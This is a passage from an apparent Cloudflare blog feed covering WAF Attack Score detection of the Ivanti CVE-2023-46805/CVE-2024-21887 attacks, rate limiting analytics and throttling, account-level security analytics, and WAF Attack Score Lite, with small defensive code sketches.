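    ranges; lower scores mean the request is more likely malicious.
    """
    if not 1 <= score <= 99:
        raise ValueError("score must be between 1 and 99")
    if score <= 20:
        return "attack"
    if score <= 50:
        return "likely_attack"
    if score <= 80:
        return "likely_clean"
    return "clean"

# The unauthenticated command request above scored 19 -- class "attack".
print(waf_score_class(19))
```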
    <div>
      <h3>Emergency rule deployment</h3>
      <a href="#emergency-rule-deployment">
        
      </a>
    </div>
    <p>In response to this critical threat, Cloudflare <a href="https://developers.cloudflare.com/waf/change-log/2024-01-17---emergency-release/">released Emergency Rules on January 17, 2024</a>, within 24 hours of the proof of concept going public. These rules are part of the WAF's Managed Rules and specifically target the threats posed by CVE-2023-46805 and the related Ivanti vulnerability CVE-2024-21887. The rules, named "Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887", block attempts to exploit these vulnerabilities, providing an extra layer of security for Cloudflare users.</p><p>Since deploying these rules we have recorded a high level of activity. At the time of writing, the rule had been triggered more than 180,000 times.</p>
<table>
<thead>
  <tr>
    <th><span>Rule ID</span></th>
    <th><span>Description</span></th>
    <th><span>Default Action</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>New Managed Rule…34ab53c5</span></td>
    <td><span>Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887</span></td>
    <td><span>Block</span></td>
  </tr>
  <tr>
    <td><span>Legacy Managed Rule</span><br /><span>100622</span><br /></td>
    <td><span>Ivanti - Auth Bypass, Command Injection - CVE:CVE-2023-46805, CVE:CVE-2024-21887</span></td>
    <td><span>Block</span></td>
  </tr>
</tbody>
</table>
    <div>
      <h3>Implications and best practices</h3>
      <a href="#implications-and-best-practices">
        
      </a>
    </div>
    <p>Cloudflare's response to CVE-2023-46805 and CVE-2024-21887 underscores the importance of having robust security measures in place. Organizations using Cloudflare services, particularly the WAF, should ensure that their systems are updated with the latest rules and configurations to maintain optimal protection. We also recommend that customers deploy rules using Attack Score to improve their security posture. If you want to learn more about Attack Score, contact your account team.</p>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>Cloudflare's proactive, AI-driven approach to identifying and stopping attacks, exemplified by its response to CVE-2023-46805 and CVE-2024-21887, shows how threats can be caught before vulnerabilities are publicly disclosed. By continuously monitoring and rapidly responding to vulnerabilities, Cloudflare helps its customers remain secure in an increasingly complex digital landscape.</p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[WAF Rules]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[WAF Attack Score]]></category>
            <category><![CDATA[Zero Day Threats]]></category>
            <category><![CDATA[AI WAF]]></category>
            <guid isPermaLink="false">4HVUjfTR7K6M1rk2RCgVkA</guid>
            <dc:creator>Himanshu Anand</dc:creator>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Vaibhav Singhal</dc:creator>
        </item>
        <item>
            <title><![CDATA[New! Rate Limiting analytics and throttling]]></title>
            <link>https://blog.cloudflare.com/new-rate-limiting-analytics-and-throttling/</link>
            <pubDate>Tue, 19 Sep 2023 13:00:41 GMT</pubDate>
            <description><![CDATA[ Cloudflare Analytics can now suggest rate limiting threshold based on historic traffic patterns. Rate Limiting also supports a throttle behavior ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://www.cloudflare.com/application-services/products/rate-limiting/">Rate Limiting</a> rules are essential in the toolbox of security professionals, as they are very effective in managing targeted volumetric attacks, <a href="https://www.cloudflare.com/learning/access-management/account-takeover/">takeover attempts</a>, <a href="https://www.cloudflare.com/learning/bots/what-is-data-scraping/">scraping bots</a>, or API abuse. Over the years we have received a lot of feature requests from users, but two stand out: suggesting rate limiting thresholds and implementing a throttle behavior. Today we released both to Enterprise customers!</p><p>When creating a rate limit rule, one of the most common questions is “what rate should I put in to block malicious traffic without affecting legitimate users?”. If your traffic is authenticated, <a href="https://www.cloudflare.com/application-services/products/api-gateway/">API Gateway</a> will suggest thresholds based on auth IDs (such as a session ID, cookie, or API key). However, when you don’t have authentication headers, you need to create IP-based rules (for example, for a ‘/login’ endpoint) and you are left guessing the threshold. Starting today, we provide analytics tools to determine what request rate to use in your rule.</p><p>Until now, a rate limit rule could be created with a log, challenge, or block action. When ‘block’ is selected, all requests from the same source (for example, IP) are blocked for the timeout period. Sometimes this is not ideal: you would rather selectively block/allow requests to enforce a maximum request rate without an outright temporary ban. When using throttle, a rule lets through enough requests to keep the request rate from individual clients below a customer-defined threshold.</p><p>Continue reading to learn more about each feature.</p>
    <div>
      <h2>Introducing Rate Limit Analysis in Security Analytics</h2>
      <a href="#introducing-rate-limit-analysis-in-security-analytics">
        
      </a>
    </div>
    <p>The <a href="https://developers.cloudflare.com/waf/security-analytics/">Security Analytics</a> view was designed to offer complete visibility into HTTP traffic while adding an extra layer of security on top. It has proven to be of great value when crafting custom rules. Nevertheless, when it comes to creating rate limiting rules, relying solely on Security Analytics can be challenging.</p><p>To create a rate limiting rule, you can leverage Security Analytics to determine the filter, i.e., which requests are evaluated by the rule (for example, by filtering on mitigated traffic, or selecting other security signals like Bot scores). However, you also need to determine the maximum rate you want to enforce, and that depends on the specific application, traffic pattern, time of day, endpoint, and so on. What’s the typical rate of legitimate users trying to access the login page at peak time? What’s the rate of requests generated by a botnet with the same JA3 fingerprint scraping prices from an ecommerce site? Until today, you couldn’t answer these questions from the analytics view.</p><p>That’s why we decided to integrate a rate limit helper into Security Analytics as a new tab called "Rate Limit Analysis", which concentrates on answering rate-related questions.</p>
    <div>
      <h3>High level top statistics vs. granular Rate Limit Analysis</h3>
      <a href="#high-level-top-statistics-vs-granular-rate-limit-analysis">
        
      </a>
    </div>
    <p>In Security Analytics, users can analyze traffic data by creating filters combining what we call <i>top statistics.</i> These statistics reveal the total volume of requests associated with a specific attribute of the <a href="https://www.cloudflare.com/learning/ddos/glossary/hypertext-transfer-protocol-http/">HTTP requests</a>. For example, you can filter the traffic from the <a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/">ASNs</a> that generated the most requests in the last 24 hours, or you can slice the data to look only at traffic reaching the most popular paths of your application. This tool is handy when creating rules based on traffic analysis.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3QmpAIl5PaDpDvc6eLBNeK/15d3af5e819eb89bb749b58eb43f24c7/image3-5.png" />
            
            </figure><p>However, for rate limits, a more detailed approach is required.</p><p>The new <i>Rate limit analysis</i> tab now displays request-rate data for traffic matching the selected filter and time period. You can select a rate defined over different time intervals, like one or five minutes, and the attribute of the request used to identify the rate, such as IP address, JA3 fingerprint, or a combination of both, which often improves accuracy. Once the attributes are selected, the chart displays the distribution of request rates for the top 50 unique clients (identified as unique IPs or JA3s) observed during the chosen time interval, in descending order.</p>
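<p>Conceptually, the chart buckets requests per client per interval and ranks clients by their busiest interval. Below is a minimal offline sketch of that aggregation over made-up sample data (the dashboard computes this for you):</p>

```python
from collections import Counter

INTERVAL = 60  # one-minute buckets

# (client_id, unix_timestamp) pairs; the client could be an IP, a JA3
# fingerprint, or both combined. Sample data is hypothetical.
requests = [("203.0.113.7", t) for t in range(0, 300, 2)]      # ~30 req/min
requests += [("198.51.100.9", t) for t in range(0, 300, 30)]   # ~2 req/min

# Count requests per (client, bucket), then keep each client's peak minute.
buckets = Counter((cid, ts // INTERVAL) for cid, ts in requests)
peak = {}
for (cid, _), n in buckets.items():
    peak[cid] = max(peak.get(cid, 0), n)

# Rank clients by their peak one-minute rate, descending.
top_clients = sorted(peak.items(), key=lambda kv: -kv[1])
print(top_clients)  # [('203.0.113.7', 30), ('198.51.100.9', 2)]
```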
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7iXu3aai6ibY25UWhtYUT1/9bef2b03e884668efbba3d8251cd4882/image2-1.png" />
            
            </figure><p>You can use the slider to determine the impact of a rule with different thresholds. How many clients would have been caught by the rule and rate limited? Can I visually identify abusers with above-average rate vs. the long tail of average users? This information will guide you in assessing what’s the most appropriate rate for the selected filter.</p>
    <div>
      <h3>Using Rate Limit Analysis to define rate thresholds</h3>
      <a href="#using-rate-limit-analysis-to-define-rate-thresholds">
        
      </a>
    </div>
    <p>Building a rate limit rule now takes only a few minutes. Let’s apply this to a common use case: the <i>/login</i> endpoint, protected by an IP-based rate limit rule with a logging action.</p><p><b>Define a scope and rate.</b></p><ul><li><p>In the <i>HTTP requests</i> tab (the default view), start by selecting a specific time period. If you’re looking for the normal rate distribution, you can specify a period with non-peak traffic. Alternatively, you can analyze the rate of offending users by selecting a period when an attack was carried out.</p></li></ul><div>
  
</div>
<p></p><ul><li><p>Using the filters in the top statistics, select a specific endpoint (e.g., <i>/login</i>). We can also focus on non-automated/human traffic using the bot score quick filter on the right sidebar or the filter button on top of the chart. In the <i>Rate limiting Analysis</i> tab, you can choose the characteristic (JA3, IP, or both) and duration (1 min, 5 mins, or 1 hour) for your rate limit rule. At this point, moving the dotted line up and down can help you choose an appropriate rate for the rule. JA3 is only available to customers using Bot Management.</p></li></ul>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ZC9jNROj5C5X6mHImu8zf/88b11e610fafe2504665dad8c22b3da6/image5-2.png" />
            
            </figure><ul><li><p>Looking at the distribution, we can exclude any IPs or ASNs known to us, to get a clearer view of end-user traffic. One way to do this is to filter out the outliers right before the long tail begins. A rule with this setting will rate limit the IPs/JA3s with a higher request rate.</p></li></ul><p><b>Validate your rate.</b> You can validate the rate by repeating this process on a portion of traffic where you know there was an attack or a traffic peak. The rate you’ve chosen should block the outliers during the attack and allow traffic during normal times. Looking at the sampled logs can also help verify the fingerprints and filters chosen.</p><p><b>Create a rule.</b> Selecting “Create rate limit rule” will take you to the rate limiting tab in the WAF with your filters pre-populated.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7bxY562ESZk6pzJYrPBvuF/35d5d626a4ee5b286dd0c087c74d756e/image7-2.png" />
            
            </figure><p><b>Choose your action and behavior in the rule.</b> Depending on your needs you can choose to log, challenge, or block requests exceeding the selected threshold. It’s often a good idea to first deploy the rule with a log action to validate the threshold and then change the action to block or challenge when you are confident with the result. With every action, you can also choose between two behaviors: fixed action or throttle. Learn more about the difference in the next section.</p>
    <div>
      <h2>Introducing the new throttle behavior</h2>
      <a href="#introducing-the-new-throttle-behavior">
        
      </a>
    </div>
    <p>Until today, the only available behavior for Rate Limiting has been <i>fixed action,</i> where an action is triggered for a selected time period (also known as timeout). For example, did the IP 192.0.2.23 exceed the rate of 20 requests per minute? Then block (or log) all requests from this IP for, let’s say, 10 minutes.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2VKfUoWJSGACGOz50fEsof/00da159c12b659159a2f883b81988a4d/Screenshot-2023-09-19-at-11.16.42.png" />
            
            </figure><p>In some situations, this type of penalty is too severe and risks affecting legitimate traffic. For example, if a device in a corporate network (think NAT) exceeds the threshold, all devices sharing the same IP will be blocked outright.</p><p>With <i>throttling</i>, rate limiting selectively drops requests to keep the rate within the specified threshold. It behaves like a leaky bucket (with the difference that we do not implement a queuing system). For example, throttling a client to 20 requests per minute means that when a request comes from this client, we look at the last 60 seconds and check whether (on average) we have received fewer than 20 requests. If so, the rule won’t perform any action. If the average is already at 20 requests, we will take action on that request. When another request comes in, we check again; since some time has passed, the average rate might have dropped, making room for more requests.</p>
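<p>The behavior described above can be sketched as a sliding-window limiter. This is a minimal single-process sketch; Cloudflare's actual implementation is distributed across its network and differs in detail:</p>

```python
from collections import deque

class Throttle:
    """Allow at most `limit` requests per trailing `window` seconds.

    Unlike a fixed block-for-timeout action, each request is judged against
    the trailing window, so traffic resumes as soon as the client's average
    rate falls back under the threshold.
    """
    def __init__(self, limit=20, window=60.0):
        self.limit, self.window = limit, window
        self.hits = deque()  # timestamps of allowed requests

    def allow(self, now):
        # Drop hits that have aged out of the trailing window.
        while self.hits and now - self.hits[0] >= self.window:
            self.hits.popleft()
        if len(self.hits) < self.limit:
            self.hits.append(now)
            return True
        return False  # apply the rule's action: block, log, or challenge

t = Throttle(limit=20, window=60.0)
burst = [t.allow(0.0) for _ in range(25)]  # 25 requests at the same instant
print(sum(burst))     # 20 allowed, 5 throttled
print(t.allow(61.0))  # True: the window has slid past the burst
```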
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5nguPmj1apYY1lehsrbybF/3b954929b65a06a4e509ddc67689a874/Screenshot-2023-09-19-at-11.17.18.png" />
            
            </figure><p>Throttling can be used with all actions: block, log, or challenge. When creating a rule, you can select the behavior after choosing the action.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/19vPKFMr4S8VXOGtUkUXTK/822e2c7b704fa0f03fa86c6044bfd288/Screenshot-2023-09-19-at-11.17.42.png" />
            
            </figure><p>When using any challenge action, we recommend using the <i>fixed</i> <i>action</i> behavior. As a result, when a client exceeds the threshold we will challenge all requests until a challenge is passed. The client will then be able to reach the origin again until the threshold is breached again.</p><p>Throttle behavior is available to Enterprise rate limiting <a href="https://developers.cloudflare.com/waf/rate-limiting-rules/#availability">plans</a>.</p>
    <div>
      <h2>Try it out!</h2>
      <a href="#try-it-out">
        
      </a>
    </div>
    <p>Today we are introducing a new Rate Limiting analytics experience along with the throttle behavior for all Rate Limiting users on Enterprise plans. We will continue to work actively on providing a better experience to save our customers' time. Log in to the dashboard, try out the new experience, and let us know your feedback using the feedback button located on the top right side of the Analytics page or by reaching out to your account team directly.</p> ]]></content:encoded>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Rate Limiting]]></category>
            <category><![CDATA[Analytics]]></category>
            <guid isPermaLink="false">CZ5Zxo3gP0GccJdEtAmcY</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Daniele Molteni</dc:creator>
        </item>
        <item>
            <title><![CDATA[Account Security Analytics and Events: better visibility over all domains]]></title>
            <link>https://blog.cloudflare.com/account-security-analytics-and-events/</link>
            <pubDate>Sat, 18 Mar 2023 17:00:00 GMT</pubDate>
            <description><![CDATA[ Revealing Account Security Analytics and Events, new eyes on your account in Cloudflare dashboard to give holistic visibility. No matter how many zones you manage, they are all there! ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/hkEsUWDVJmPQ7DAieHQCS/6571ab358294597bd14e95b5f1feb5ed/Account-level-Security-Analytics-and-Security-Events_-better-visibility-and-control-over-all-account-zones-at-once.png" />
            
            </figure><p>Cloudflare offers many security features like <a href="https://developers.cloudflare.com/waf/">WAF</a>, <a href="https://developers.cloudflare.com/bots/">Bot Management</a>, <a href="https://developers.cloudflare.com/ddos-protection/">DDoS protection</a>, <a href="https://developers.cloudflare.com/cloudflare-one/">Zero Trust</a>, and more! This suite of products is offered in the form of rules that give baseline protection against common attacks. These rules are usually configured and monitored per domain, which is very simple when we are talking about one, two, maybe three domains (or, in Cloudflare’s terms, “zones”).</p>
    <div>
      <h3>The zone-level overview is not always time efficient</h3>
      <a href="#the-zone-level-overview-sometimes-is-not-time-efficient">
        
      </a>
    </div>
    <p>If you’re a Cloudflare customer with tens, hundreds, or even thousands of domains under your control, you’d spend hours going through these domains one by one, monitoring and configuring all security features. We know that’s a pain, especially for our Enterprise customers. That’s why last September we announced the <a href="/account-waf/">Account WAF</a>, where you can create one security rule and have it applied to the configuration of all your zones at once!</p><p>Account WAF makes it easy to deploy security configurations. Following the same philosophy, we want to empower our customers by providing visibility over these configurations, or even better, visibility on all HTTP traffic.</p><p>Today, Cloudflare is offering holistic views on the security suite by launching Account Security Analytics and Account Security Events. Now, across all your domains, you can monitor traffic, get insights quicker, and save hours of your time.</p>
    <div>
      <h3>How do customers get visibility over security traffic today?</h3>
      <a href="#how-do-customers-get-visibility-over-security-traffic-today">
        
      </a>
    </div>
    <p>Before today, to view account-wide analytics or events, customers had two options: access each zone individually to check its events and analytics dashboards, or use the zone-level <a href="https://developers.cloudflare.com/analytics/graphql-api/">GraphQL Analytics API</a> or logs to pull data into their preferred storage provider, where they could aggregate it and plot graphs to get insights across all zones under their account, in case ready-made dashboards were not provided.</p>
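<p>That do-it-yourself path typically meant scripting one GraphQL query per zone and aggregating the results. Below is a hedged sketch of building such a request body; the <code>firewallEventsAdaptive</code> dataset and its field names follow the GraphQL Analytics schema as documented, but treat them as assumptions and check the schema explorer before use:</p>

```python
import json

def firewall_events_query(zone_tag, start, end, limit=100):
    """Build a GraphQL Analytics request body for one zone's firewall events.

    POST the returned body to https://api.cloudflare.com/client/v4/graphql
    with an API token. Dataset/field names are assumptions based on the
    documented schema.
    """
    query = """
    query ($zoneTag: String!, $start: Time!, $end: Time!, $limit: Int!) {
      viewer {
        zones(filter: { zoneTag: $zoneTag }) {
          firewallEventsAdaptive(
            filter: { datetime_geq: $start, datetime_leq: $end }
            limit: $limit
          ) { action clientIP clientCountryName }
        }
      }
    }"""
    return json.dumps({
        "query": query,
        "variables": {"zoneTag": zone_tag, "start": start, "end": end, "limit": limit},
    })

# Hypothetical zone tag; repeat per zone and aggregate the results yourself.
body = firewall_events_query("0123456789abcdef0123456789abcdef",
                             "2023-03-17T00:00:00Z", "2023-03-18T00:00:00Z")
```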
    <div>
      <h3>Introducing Account Security Analytics and Events</h3>
      <a href="#introducing-account-security-analytics-and-events">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6gWJhl65y6sUNRHNaZjwqt/d2a107ab79c0a3da65c4721a1b48fa74/Screenshot-2023-03-17-at-9.57.13-AM.png" />
            
            </figure><p>The new views are security-focused, data-driven dashboards. Like their zone-level counterparts, both include sampled logs and top filters over many source dimensions (for example, IP address, host, country, and ASN).</p><p>The main difference between them is that Account Security Events focuses on the current configuration of every zone you have, which makes reviewing mitigated requests (rule matches) easy. This step is essential in distinguishing actual threats from false positives, and in maintaining an optimal security configuration.</p><p>Part of the power of Security Events is showing events “by service”, listing the security-related activity per security feature (for example, <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a>, Firewall Rules, API Shield), and events “by action” (for example, allow, block, challenge).</p><p>Account Security Analytics, on the other hand, shows a wider angle: all HTTP traffic on all zones under the account, whether or not that traffic was mitigated, i.e., whether the security configurations took an action to prevent the request from reaching your zone. This is essential for fine-tuning your security configuration, finding possible false negatives, or onboarding new zones.</p><p>The view also provides quick filters, or insights, highlighting cases we think are worth exploring. Many of the view's components are similar to the zone-level <a href="/security-analytics/">Security Analytics</a> we introduced recently.</p><p>To get to know the components and how they interact, let’s walk through an actual example.</p>
    <div>
      <h3>Analytics walk-through when investigating a spike in traffic</h3>
      <a href="#analytics-walk-through-when-investigating-a-spike-in-traffic">
        
      </a>
    </div>
    <p>Traffic spikes happen to many customers’ accounts. To investigate the reason behind a spike and check what’s missing from your configuration, we recommend starting from Analytics, as it shows both mitigated and non-mitigated traffic; to then review the mitigated requests and double-check for false positives, Security Events is the place to go. That’s what we’ll do in this walk-through: start with Analytics, find a spike, and check whether further mitigation is needed.</p><p><b>Step 1:</b> To navigate to the new views, sign in to the Cloudflare dashboard and select the account you want to monitor. You will find <b>Security Analytics</b> and <b>Security Events</b> in the sidebar under <b>Security Center.</b></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6GQ2Z3yAa1OehelJegPHZU/ffc7db3bde4a6976ed94e6eab597458c/pasted-image-0--8--2.png" />
            
            </figure><p><b>Step 2:</b> In the Analytics dashboard, if you see a big spike compared to your usual traffic, there’s a good chance it’s a layer 7 DDoS attack. Once you spot one, zoom into that time interval in the graph.</p>
<i>Zooming into a traffic spike on the timeseries scale</i><br /><p>Expanding the top-N statistics at the top of the analytics page, we can make several observations:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5XDngTA5PHz7hc0O8f7RJ8/5bfe5659e3eafa42689d998f2de886a3/pasted-image-0--9--1.png" />
            
            </figure><p>We can confirm it’s a DDoS attack because the peak of traffic does not come from a single IP address; it’s distributed over multiple source IPs. The “edge status code” indicates that a rate limiting rule is already applied to this attack, which uses GET requests over HTTP/2.</p><p>On the right-hand side of the analytics, “Attack Analysis” indicates that these requests were clean of <a href="https://www.cloudflare.com/learning/security/how-to-prevent-xss-attacks/">XSS</a>, SQLi, and common RCE attacks, while the Bot Scores distribution under Bot Analysis marks the traffic as automated; these two products add another layer of intelligence to the investigation. We can deduce that the attacker is sending clean requests in a high-volume attack from multiple IPs to take the web application down.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3mBN0yDIQo4aK0HAXCO5Yb/98fe973514f449147b3171e579c2dbce/pasted-image-0--10--1.png" />
            
            </figure><p><b>Step 3:</b> For this attack we can see we already have rules in place to mitigate it, and this visibility gives us the freedom to fine-tune our configuration for a better security posture if needed. We can filter on the attack’s fingerprint: for instance, add a filter on the referer <a href="http://www.example.com">www.example.com</a>, which receives the bulk of the attack requests, a filter on path equals <code>/</code>, the HTTP method, the query string, and a filter on automated traffic using Bot score. We will see the following:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6bI1AAaTSFbA7nPxvx4lZn/2f8197708c7dc3ac8d842ff2c003b4eb/pasted-image-0--11-.png" />
            
            </figure><p><b>Step 4:</b> Jumping to Security Events to zoom in on our mitigation actions: in this case, the spike fingerprint is mitigated using two actions, Managed Challenge and Block.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6JuvFbzYoI01oHDIrCh7ze/3e21d9d444699434a28e25eea8422423/pasted-image-0--12-.png" />
            
            </figure><p>The mitigation was applied by Firewall Rules and DDoS configurations; the exact rules are shown in the top events.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/20ANCsBgB0TowOniXpMl0E/1e4445f96e05af157c3174314422513b/pasted-image-0--13-.png" />
            
            </figure>
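<p>The fingerprint filter from Step 3 maps naturally onto an expression in the Rules language used by WAF custom rules. A small sketch composing such an expression in Python; the field names follow Cloudflare's Rules language, while the bot-score threshold of 30 standing in for "automated" is an illustrative assumption:</p>

```python
# Compose a WAF custom rule expression matching the attack fingerprint
# from Step 3. Field names follow Cloudflare's Rules language; the
# bot-score cutoff of 30 is an assumption for this sketch.
clauses = [
    'http.referer contains "www.example.com"',  # bulk of the attack requests
    'http.request.uri.path eq "/"',             # targeted path
    'http.request.method eq "GET"',             # method seen in analytics
    'cf.bot_management.score lt 30',            # automated traffic only
]
expression = "(" + " and ".join(clauses) + ")"
print(expression)
```

<p>An expression like this could back a custom rule with a Managed Challenge or Block action, mirroring the mitigations seen in Step 4.</p>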
    <div>
      <h3>Who gets the new views?</h3>
      <a href="#who-gets-the-new-views">
        
      </a>
    </div>
    <p>Starting this week, all customers on Enterprise plans will have access to Account Security Analytics and Security Events. We recommend adding Account Bot Management, WAF Attack Score, and Account WAF for full visibility and the complete set of actions.</p>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>The new Account Security Analytics and Events bring together metadata generated by the Cloudflare network for all your domains in one place. Going forward, we will keep improving the experience to save our customers time. The views are currently in beta: log in to the dashboard, check them out, and let us know your feedback.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Dashboard]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">7lBffZk4kfTbrZ48l1NMo8</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Nick Downie</dc:creator>
        </item>
        <item>
            <title><![CDATA[Announcing WAF Attack Score Lite and Security Analytics for business customers]]></title>
            <link>https://blog.cloudflare.com/waf-attack-score-for-business-plan/</link>
            <pubDate>Wed, 15 Mar 2023 13:00:00 GMT</pubDate>
            <description><![CDATA[ We are making the machine learning empowered WAF and Security analytics view available to our Business plan customers, to help detect and stop attacks before they are known ]]></description>
            <content:encoded><![CDATA[ <p></p><p>In December 2022 we announced the general availability of the <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>. The initial release was for our Enterprise customers, but we have always believed this product should be available to more users. Today we’re announcing “WAF Attack Score Lite” and “Security Analytics” for our Business plan customers.</p>
    <div>
      <h3>Looking back on “What is WAF Attack Score and Security Analytics?”</h3>
      <a href="#looking-back-on-what-is-waf-attack-score-and-security-analytics">
        
      </a>
    </div>
    <p>Vulnerabilities on the Internet appear almost daily. The <a href="https://cve.mitre.org/">CVE</a> (common vulnerabilities and exposures) program maintains a list of over 197,000 records tracking disclosed vulnerabilities.</p><p>That makes it really hard for web application owners to harden and update their systems regularly, especially for critical libraries, where exploitation can cause significant damage such as information leaks. That’s why web application owners tend to use <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAFs (Web Application Firewalls)</a> to protect their online presence.</p><p>Most WAFs use signature-based detections: rules created based on specific attacks that we know about. The signature-based method is very fast, has a low rate of false positives (requests incorrectly categorized as attacks when they are actually legitimate), and is very efficient against most of the attack categories we know. However, signatures sometimes have a blind spot when a new attack appears, often called a <a href="https://en.wikipedia.org/wiki/Zero-day_(computing)?cf_target_id=E4C6647B3175407AE832B11B197C13AB">zero-day</a> attack. As soon as a new vulnerability is found, our security analysts take fast action to stop it within a matter of hours and update the <a href="https://developers.cloudflare.com/waf/managed-rules/">WAF Managed Rules</a>, yet we want to protect our customers during this gap as well.</p><p>This is the main reason Cloudflare created a complementary feature to the WAF <a href="https://developers.cloudflare.com/waf/managed-rules/">managed rules</a>: a smart machine learning layer that helps detect unknown attacks and protects customers during the time gap until rules are updated.</p>
    <div>
      <h3>Early detection + Powerful mitigation = Safer Internet</h3>
      <a href="#early-detection-powerful-mitigation-safer-internet">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6QVg4BUsujsYrq75VAHZiL/d3b594dfebf2aba889d9ab521b916413/image2-15.png" />
            
            </figure><p>The performance of any <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning</a> model depends heavily on the data it was trained on. Our machine learning uses a supervised model trained on hundreds of millions of requests generated by WAF Managed Rules; the data varied between clean and malicious, and some was blended with fuzzing techniques to enable catching similar patterns, as covered in our blog “<a href="/data-generation-and-sampling-strategies/">Improving the accuracy of our machine learning WAF</a>”. At the moment, there are three types of attacks our machine learning model is optimized to find: SQL Injection (SQLi), <a href="https://www.cloudflare.com/learning/security/how-to-prevent-xss-attacks/">Cross Site Scripting (XSS)</a>, and a wide range of Remote Code Execution (RCE) attacks such as shell injection, PHP injection, Apache Struts type compromises, Apache log4j, and similar attacks that result in RCE.</p><p>We started with these categories based on Cloudflare’s <a href="/application-security-2023/">Application Security Report</a>: they represent more than 24% of the mitigated layer 7 attacks over the last year in our WAF, and are therefore more prone to exploitation.</p><p>In the full Enterprise WAF Attack Score version, we offer more granularity on the attack categories and provide scores for each class, which can be configured freely per domain.</p>
    <div>
      <h3>WAF Attack Score Lite Features for Business Plan</h3>
      <a href="#waf-attack-score-lite-features-for-business-plan">
        
      </a>
    </div>
    <p>WAF Attack Score Lite and the Security Analytics view offer three main functions:</p><p><b>1- Attack detection:</b> This happens through inspecting every incoming HTTP request and classifying it into one of four classes: Attack, Likely Attack, Likely Clean, and Clean. At the moment, there are three types of attacks our machine learning model is optimized to find: SQL Injection (SQLi), Cross Site Scripting (XSS), and a wide range of Remote Code Execution (RCE) attacks.</p><p><b>2- Attack mitigation:</b> The ability to create WAF Custom Rules or WAF Rate Limiting Rules to mitigate requests. We’re exposing a new field cf.waf.score.class that has the preset values: attack, likely_attack, likely_clean, and clean. Customers can use this field in rule expressions and apply the needed actions.</p>
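<p>For example, the new field can drive a pair of custom rules, one per class. A minimal sketch building the expressions as strings; blocking attack and challenging likely_attack is an illustrative policy choice, not a recommendation from this post:</p>

```python
# Sketch: one rule expression per cf.waf.score.class preset value.
# The class values come from the field's documented presets above;
# the action pairing (block vs. managed_challenge) is illustrative.
rules = [
    {"expression": 'cf.waf.score.class eq "attack"',
     "action": "block"},
    {"expression": 'cf.waf.score.class eq "likely_attack"',
     "action": "managed_challenge"},
]
for rule in rules:
    print(f'{rule["action"]}: {rule["expression"]}')
```

<p>Requests classified likely_clean or clean would simply fall through to the rest of your configuration.</p>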
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/70J5HfmuVRknKJ7iYJWfH2/7b370b949c9cc3c7d2d9c88d039700e0/Screenshot-2023-03-09-at-22.15.20.png" />
            
            </figure><p><b>3- Visibility over your entire traffic:</b> Security Analytics is a new dashboard currently in beta. It provides a comprehensive view across all your HTTP traffic, which displays all requests whether they match rules or not. Security Analytics is a great tool for investigating false negatives and hardening your security configurations. Security Events is still available in <b>(Security &gt; Events)</b> and Security Analytics is available in a separate tab <b>(Security &gt; Analytics)</b>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4raUfutGDBtIejiloAbafc/24621d78251095de0396d33dd0eea1cc/pasted-image-0-9.png" />
            
            </figure>
    <div>
      <h3>Deployment and configuration</h3>
      <a href="#deployment-and-configuration">
        
      </a>
    </div>
